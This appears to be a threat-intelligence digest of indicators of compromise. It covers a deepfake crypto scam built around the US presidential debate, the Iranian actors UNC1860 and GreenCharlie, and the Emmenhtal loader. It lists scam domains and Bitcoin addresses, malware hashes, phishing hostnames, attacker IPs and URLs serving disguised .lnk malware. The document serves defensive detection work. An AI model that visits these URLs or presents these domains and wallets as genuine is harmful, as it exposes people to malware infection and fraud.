Deep Fake Crypto Scams Cybercriminals exploited the U.S. presidential debate to launch a cryptocurrency scam using deep fake videos. The scam featured fake streams on hijacked YouTube channels, claiming to show Elon Musk and Donald Trump debating Kamala Harris. The videos directed viewers to invest in cryptocurrency during the event. The campaign used well-established YouTube accounts, QR codes linked to deceptive domains, and AI-generated content to lure victims. Multiple researchers reported on this scam, which leveraged current events to boost search rankings. The scammers used 'stream-jacking' to rebrand victim channels as Tesla-related, then posted pre-recorded 'livestreams' with inflated view counts. Scam sites used anti-bot measures and urged victims to link their crypto wallets, with some wallets accumulating significant funds.
Type Indicator
BitcoinAddress bc1qfwjgvwesz5k2dpjpvwueze2v009wjh76hn9gfn
BitcoinAddress bc1qjanjaawj4g0n5xlm03dmpx97u5yrpzljuhuxz8
domain ark-fund.pro
domain chaindrop.promo
domain crypto-participate.com
domain debate.gift
domain doubleetherx2.com
domain eth-up.gift
domain eth23.io
domain ether2022.info
domain eththemerge.net
domain give-toncoin.com
domain harryteams.com
domain promo-tesla.io
domain takeeth.net
domain tesladebate.com
domain teslatrump.org
domain trump-debate.com
domain trump-elon.gives
domain trumptesla.org
domain usmusk.net
domain x2-event.pro
domain x2coinbase.org
hostname eththemerge.survay.pro
UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks
UNC1860 is an Iranian state-sponsored threat actor likely affiliated with Iran's Ministry of Intelligence and Security. It employs specialized tools and passive backdoors to gain initial access and persistent network access, particularly targeting government and telecommunications sectors in the Middle East. The group's capabilities include providing initial access for other actors, using GUI-operated malware controllers, and maintaining a diverse collection of passive implants. UNC1860's arsenal includes utilities for defense evasion, kernel-level drivers, and custom implementations of encryption methods. The actor demonstrates advanced Windows OS knowledge and reverse engineering skills, making it a formidable threat capable of supporting various objectives from espionage to network attacks.
Type Indicator
CVE CVE-2019-0604
FileHash-MD5 07db3058e32fe5f36823dc7092cd7d5b
FileHash-MD5 0c93cac9854831da5f761ee98bb40c37
FileHash-MD5 0c9ff0db00f04fd4c6a9160bffd85a1d
FileHash-MD5 1176381da7dea356f3377a59a6f0e799
FileHash-MD5 126bc1c30fba27f8bf67dce4892b1e8c
FileHash-MD5 14e54ff4805840e656efb8cd38de4751
FileHash-MD5 17b27e6aa0ab6501f11bb4d2e0f829ff
FileHash-MD5 1e6679cd25d1bb127a0bec665adcf21e
FileHash-MD5 1e896f026246872b2feb4f8e3e093815
FileHash-MD5 2398a83f10329a107801d3d23d06f7cb
FileHash-MD5 286bd9c2670215d3cb4790aac4552f22
FileHash-MD5 2cece71e107d12ffd74b2fb24bf339a6
FileHash-MD5 2e803d28809be2a0216f25126efde37b
FileHash-MD5 31f2369d2e38c78f5b3f2035dba07c08
FileHash-MD5 3d5d05f230ae702c04098de512d93d48
FileHash-MD5 3dd829fb27353622eff34be1eabb8f18
FileHash-MD5 4029bc4a06638bb9ac4b8528523b72f6
FileHash-MD5 41f4732ed369f2224a422752860b0bc5
FileHash-MD5 46804472541ed61cc904cd14be18fe1d
FileHash-MD5 490590bfdeeedf44b3ae306409bb0d03
FileHash-MD5 4abcf21b63781a53bbc1aa17bd8d2cbc
FileHash-MD5 4b2c78bb2c439998cff0cc097a14b942
FileHash-MD5 4dd6250eb2d368f500949952eb013964
FileHash-MD5 4de802f7e61cb8c820a02e042b58b215
FileHash-MD5 57c916da83cc634af22bde0ad44d0db3
FileHash-MD5 57cd8e220465aa8030755d4009d0117c
FileHash-MD5 6626dbe74acd15d06ff6900071ef240c
FileHash-MD5 69fd67c115349abb4a313230a1692642
FileHash-MD5 6d3041b89484c273376e5189e190d235
FileHash-MD5 73fb0fe5cd96a14a4f85639223aec6a8
FileHash-MD5 7b2fa099d51fa3885766f6d60d768748
FileHash-MD5 7f5f5f290910d256e6b012f898c88bf3
FileHash-MD5 85427a8a47c4162b48d8dfb37440665d
FileHash-MD5 8d070a93a45ed8ba6dba6bfbe0d084e7
FileHash-MD5 929b12bc9f9e5f8e854de1d46ebf40d9
FileHash-MD5 952482949f495fb66e493e441229ae4b
FileHash-MD5 a038975255d3dda636d86ccd307f7838
FileHash-MD5 a3ea0d13848a104c28d035a9d518acc2
FileHash-MD5 a500561c0b374816972094c2aa90da2a
FileHash-MD5 a65ee1a82975ee4c8d4e70219e1bfff5
FileHash-MD5 a7693e399602eb79db537c5022dd1e01
FileHash-MD5 a90236e4962620949b720f647a91f101
FileHash-MD5 a991bdbf1e36d7818d7a340a35a4ea26
FileHash-MD5 b219672bcd60ce9a81b900217b3b5864
FileHash-MD5 b26d54b7da7b2bf600104f69da4ea00f
FileHash-MD5 b34883fb1630db43e06a38cebfa0bce2
FileHash-MD5 b4b1e285b9f666ae7304a456da01545e
FileHash-MD5 bd6464f12bb6f7f02b6ffebb363d8e5f
FileHash-MD5 c11a4e4a2d484513f79bd127a0387b0c
FileHash-MD5 c21eefc65cda49f17ddd1d243a7bffb5
FileHash-MD5 c50ae2c4b76f0d5724ec240568c78c4f
FileHash-MD5 c517519097bff386dc1784d98ad93f9d
FileHash-MD5 c57e59314aee7422e626520e495effe0
FileHash-MD5 c8fa0ce3ae6a13af640607ea606c55f9
FileHash-MD5 c90ec587e3333dabb647ebc182673460
FileHash-MD5 ca3f0d25f7da0e8cde8e1f367451c77a
FileHash-MD5 caffdb648a0a68cd36694f0f0c7699d7
FileHash-MD5 ce537dd649a391e52c27a3f88a0a8912
FileHash-MD5 d1ce3117060e85247145c82005dda985
FileHash-MD5 d1e45afbfd3424612b4a4218cc7357ef
FileHash-MD5 d87ca3f830b8b53fde358bb64900f6af
FileHash-MD5 d9719f6738dbfaa21be7f184512fe074
FileHash-MD5 da0085a97c38ead734885e5cced1847f
FileHash-MD5 e67687b4443f58d2b0a465e3af3caffe
FileHash-MD5 e86e885e6c96ac72482741d8696c17fb
FileHash-MD5 efe8043e1b4214640c5f7b5ddf737653
FileHash-MD5 f0dfb7bf01c0412891da8fa2702f4c7b
FileHash-MD5 f292e61774c267c3787fdfcace50ea7b
FileHash-MD5 f89be788e4adf665acf1a8ef8fcaa133
FileHash-MD5 fa1c6f7a5e02374b9d33de2578cb3399
FileHash-MD5 fc90907e70f18c7f6a6b9d9599b6f97c
FileHash-MD5 ff6f16b00c9f36b32cd60fecd4dfc8e9
FileHash-SHA1 22c9da04847c26188226c3a345e2126ef00aa19e
FileHash-SHA1 2df9c309e08140e9e9af624a6c40355819a91720
FileHash-SHA1 32a1651bb810bbe58df73bc2d2c2fa702ca7abd0
FileHash-SHA1 398ee9da244c53a136efee5e1d8acd1298008497
FileHash-SHA1 39cc32a3ede0d01cd89c7b5424beda618f805982
FileHash-SHA1 3f2fd2dfd27bf3cafcbf0946e308832e11a1d9c1
FileHash-SHA1 4c34d1cd875e39a8fa854eff3b520cdc68275f9d
FileHash-SHA1 6802e2d2d4e6ee38aa513dafd6840e864310513b
FileHash-SHA1 6cafd44c86fff605b4c25582955b725b96c1d911
FileHash-SHA1 6ec0c1d6311656c76787297775a8d0cb0aa6c4c7
FileHash-SHA1 70bc7b43e119060dce54568a1beb140da565a482
FileHash-SHA1 7820e56fbcde06ff766239e58c53610151962def
FileHash-SHA1 7f7d144cc80129d0db3159ea5d4294c34b79b20a
FileHash-SHA1 9c58ec8f7ce75ba1b629c9ef84ab069a32313288
FileHash-SHA1 a4044e90be800adab547a238f8639db3cf92ebdc
FileHash-SHA1 b8421c8e54fa5dabcfd38df68b3ac93b449d8d2d
FileHash-SHA1 b871e9afd7da87ee818ed7349a1579f3b31e104f
FileHash-SHA1 c0afb5797e6873bbee69f9bf0aa7a9dd3a1c6fff
FileHash-SHA1 c1fbe0fc31099b71315355da25a7036ea51a8627
FileHash-SHA1 dba1dce5bfe4e0290bd378a0126492569bdabc39
FileHash-SHA1 e287f70804460043b12410f95b4fa400e1910f42
FileHash-SHA1 eb60ffb03e1da380563e796b867fbddeb1fac77d
FileHash-SHA1 ec238353f020243758eb7511dddf8ab6ba01b35d
FileHash-SHA256 1146b1f38e420936b7c5f6b22212f3aa93515f3738c861f499ed1047865549cb
FileHash-SHA256 1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e
FileHash-SHA256 2097320e71990865f04b9484858d279875cf5c66a5f6d12c819a34e2385da838
FileHash-SHA256 269d7faed3a01b5ff9181df32e3fdbf7f7f193cc53e4f28aa21290343e69f3cd
FileHash-SHA256 36b61f94bdfc86e736a4ee30718e0b1ee1c07279db079d48d3fe78b1578dbf03
FileHash-SHA256 3875ed58c0d42e05c83843b32ed33d6ba5e94e18ffe8fb1bf34fd7dedf3f82a7
FileHash-SHA256 596b2a90c1590eaf704295a2d95aae5d2fec136e9613e059fd37de4b02fd03bb
FileHash-SHA256 6f0a38c9eb9171cd323b0f599b74ee571620bc3f34aa07435e7c5822663de605
FileHash-SHA256 7495c1ea421063845eb8f4599a1c17c105f700ca0671ca874c5aa5aef3764c1c
FileHash-SHA256 8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330
FileHash-SHA256 9117bd328e37be121fb497596a2d0619a0eaca44752a1854523b8af46a5b0ceb
FileHash-SHA256 a052413e65e025cbefdddff6eeae91161de17ffec16d3a741dd9b7c33d392435
FileHash-SHA256 a2598161e1efff623de6128ad8aafba9da0300b6f86e8c951e616bd19f0a572b
FileHash-SHA256 c0dc609e6fc8801bb902d14910c3ffd69d6bd5a26389836446dc4c23565ddcc7
FileHash-SHA256 c3fa9432243e1a2ab1991ab4c07a19392038e6a8e817e5fea0232c4caabbb950
FileHash-SHA256 c5b4542d61af74cf7454d7f1c8d96218d709de38f94ccfa7c16b15f726dc08c0
FileHash-SHA256 da450c639c9a50377233c0f195c3f6162beb253f320ed57d5c9bb9c7f0e83999
FileHash-SHA256 e1ad173e49eee1194f2a55afa681cef7c3b8f6c26572f474dec7a42e9f0cdc9d
FileHash-SHA256 f4639c63fb01875946a4272c3515f005d558823311d0ee4c34896c2b66122596
FileHash-SHA256 f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d
FileHash-SHA256 fa2c5fa2814d4db288bf8733edc4f1a78cd2c72cde90f42cf5b14162ac648042
FileHash-SHA256 fe14edf4db2a9838f15aaf24a5837ffc5c901313d6fd2fe60d15401154e44406
GreenCharlie Infrastructure Linked to US Political Campaign Targeting
An analysis by Insikt Group revealed a significant surge in cyber threat activities from GreenCharlie, an Iran-linked group associated with Mint Sandstorm, Charming Kitten, and APT42. The group persistently targets US political and governmental entities through sophisticated phishing operations involving malware like GORBLE and POWERSTAR. Their infrastructure employs dynamic DNS providers and deceptive domain themes to facilitate phishing attacks. Recorded Future's Network Intelligence identified Iran-based IP addresses communicating with GreenCharlie's infrastructure, further suggesting Iranian involvement in these operations.
Type Indicator
FileHash-SHA256 33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156
FileHash-SHA256 4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f
FileHash-SHA256 c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3
domain activeeditor.info
domain chatsynctransfer.info
domain cloudarchive.info
domain cloudregionpages.info
domain directfileinternal.info
domain itemselectionmode.info
domain messagepending.info
domain onetimestorage.info
domain onlinecloudzone.info
domain personalcloudparent.info
domain personalwebview.info
domain pkglessplans.xyz
domain projectdrivevirtualcloud.co.uk
domain realcloud.info
domain researchdocument.info
domain selfpackage.info
domain webviewerpage.info
hostname admin.cheap-case.site
hostname api.cheap-case.site
hostname api.overall-continuing.site
hostname app.cheap-case.site
hostname backend.cheap-case.site
hostname callfeedback.duia.ro
hostname cloudtools.duia.eu
hostname coldwarehexahash.dns-dynamic.net
hostname contentpreview.redirectme.net
hostname continue.duia.eu
hostname continueresource.forumz.info
hostname demo.cheap-case.site
hostname destinationzone.duia.eu
hostname dev.cheap-case.site
hostname doceditor.duckdns.org
hostname documentcloudeditor.ddnsgeek.com
hostname dynamicrender.line.pm
hostname dynamictranslator.ddnsgeek.com
hostname editioncloudfiles.dns-dynamic.net
hostname entryconfirmation.duckdns.org
hostname filereader.dns-dynamic.net
hostname finaledition.redirectme.net
hostname highlightsreview.line.pm
hostname hugmefirstddd.ddns.net
hostname icenotebook.ddns.net
hostname joincloud.duckdns.org
hostname joincloud.mypi.co
hostname lineeditor.001www.com
hostname lineeditor.32-b.it
hostname lineeditor.mypi.co
hostname linereview.duia.eu
hostname longlivefreedom.ddns.net
hostname mobiletoolssdk.dns-dynamic.net
hostname nextcloud.duia.us
hostname nextcloudzone.dns-dynamic.net
hostname overflow.duia.eu
hostname preparingdestination.fixip.org
hostname readquickarticle.dns-dynamic.net
hostname realpage.redirectme.net
hostname reviewedition.duia.eu
hostname searchstatistics.duckdns.org
hostname sharestoredocs.theworkpc.com
hostname smartview.dns-dynamic.net
hostname softservicetel.ddns.net
hostname sourceusedirection.mypi.co
hostname storageprovider.duia.eu
hostname streaml23.duia.eu
hostname synctimezone.dns-dynamic.net
hostname termsstatement.duckdns.org
hostname thisismyapp.accesscam.org
hostname thisismydomain.chickenkiller.com
hostname timelinepage.dns-dynamic.net
hostname timezone-update.duckdns.org
hostname towerreseller.dns-dynamic.net
hostname tracedestination.duia.eu
hostname translatorupdater.dns-dynamic.net
hostname uptime-timezone.dns-dynamic.net
hostname uptimezonemetadta.run.place
hostname vector.kozow.com
hostname viewdestination.vpndns.net
hostname worldstate.duia.us
hostname www.chatsynctransfer.info
hostname www.selfpackage.info
WebDAV-as-a-Service: Uncovering the infrastructure behind Emmenhtal loader distribution - Sekoia.io Blog
The Emmenhtal loader, also known as PeakLight, operates in a memory-only manner, making it difficult to detect and analyse. It is primarily used to distribute other malicious payloads, including well-known infostealers that target sensitive information.
Type Indicator
IPv4 104.131.7.207
IPv4 141.98.234.166
IPv4 147.45.178.54
IPv4 147.45.50.142
IPv4 147.45.50.144
IPv4 147.45.50.172
IPv4 147.45.50.214
IPv4 147.45.50.23
IPv4 147.45.50.26
IPv4 147.45.50.34
IPv4 147.45.50.57
IPv4 147.45.50.86
IPv4 147.45.79.82
IPv4 151.236.17.180
IPv4 168.100.9.199
IPv4 178.209.51.222
IPv4 185.143.223.188
IPv4 185.196.8.158
IPv4 191.243.196.114
IPv4 193.124.33.71
IPv4 193.233.75.13
IPv4 194.190.152.108
IPv4 194.87.252.22
IPv4 200.150.194.109
IPv4 206.188.196.28
IPv4 212.18.104.111
IPv4 45.151.62.238
IPv4 46.29.234.129
IPv4 62.133.61.101
IPv4 62.133.61.104
IPv4 62.133.61.106
IPv4 62.133.61.148
IPv4 62.133.61.155
IPv4 62.133.61.168
IPv4 62.133.61.189
IPv4 62.133.61.207
IPv4 62.133.61.240
IPv4 62.133.61.26
IPv4 62.133.61.37
IPv4 62.133.61.43
IPv4 62.133.61.49
IPv4 62.133.61.56
IPv4 62.133.61.69
IPv4 62.133.61.73
IPv4 62.133.61.79
IPv4 62.133.61.90
IPv4 62.133.61.97
IPv4 62.133.61.98
IPv4 78.153.139.202
IPv4 79.137.203.158
IPv4 82.115.223.234
IPv4 84.247.187.231
IPv4 89.110.78.58
IPv4 89.23.103.118
IPv4 89.23.103.123
IPv4 89.23.103.15
IPv4 89.23.103.188
IPv4 89.23.103.205
IPv4 89.23.103.253
IPv4 89.23.103.56
IPv4 89.23.103.57
IPv4 89.23.103.8
IPv4 89.23.103.97
IPv4 89.23.107.113
IPv4 89.23.107.123
IPv4 89.23.107.168
IPv4 89.23.107.181
IPv4 89.23.107.240
IPv4 89.23.107.244
IPv4 89.23.107.251
IPv4 89.23.107.67
IPv4 89.23.113.140
IPv4 91.202.233.136
IPv4 91.92.240.234
IPv4 91.92.240.247
IPv4 91.92.240.29
IPv4 91.92.243.198
IPv4 91.92.243.74
IPv4 91.92.245.185
IPv4 91.92.245.222
IPv4 91.92.246.102
IPv4 91.92.248.129
IPv4 91.92.248.50
IPv4 91.92.248.77
IPv4 91.92.248.90
IPv4 91.92.250.123
IPv4 91.92.250.150
IPv4 91.92.250.44
IPv4 91.92.251.35
IPv4 91.92.253.126
IPv4 91.92.254.167
IPv4 91.92.254.225
IPv4 92.118.112.223
IPv4 92.118.112.253
IPv4 94.131.112.206
IPv4 94.156.64.74
IPv4 94.156.64.76
IPv4 94.156.65.126
IPv4 94.156.65.130
IPv4 94.156.69.111
IPv4 94.156.69.6
IPv4 94.156.8.31
IPv4 95.164.68.24
IPv4 95.216.196.85
URL http://147.45.50.214/Downloads/demo.pdf.lnk
URL http://147.45.50.57/Downloads/INVOICE%20340138551.pdf.lnk
URL http://147.45.79.82/Downloads/qqeng.pdf.lnk
URL http://151.236.17.180/Wire%20Confirmation/WireConfirmation.pdf.lnk
URL http://206.188.196.28/Downloads/example.lnk
URL http://62.133.61.101/Downloads/Invoice.pdf.lnk
URL http://62.133.61.104/Downloads/test.pdf.lnk
URL http://62.133.61.37/Downloads/config.txt.lnk
URL http://62.133.61.73/Downloads/Photo.lnk
URL http://89.23.103.56/Downloads/Videof/Full%20Video%20HD%20%281080p%29.lnk
URL http://89.23.107.244/Downloads/Test.lnk
URL http://89.23.107.67/Downloads/2023-Documents%20Shared.lnk
URL http://91.92.243.198:81/Downloads/test.lnk
URL http://91.92.251.35/Downloads/solaris-docs.lnk
URL http://92.118.112.253/Downloads/releaseform.pdf.lnk
URL http://94.156.64.74/Downloads/SecretTeachings.pdf.lnk
Xyber Xecurity is an online learning platform for Cyber Security.

Belleza BSA, 1st Floor Unit 106, Jl. Letjen Soepeno, RT 004 / RW 002, Kel. Grogol Utara, Kec. Kebayoran Lama, Jakarta Selatan 12210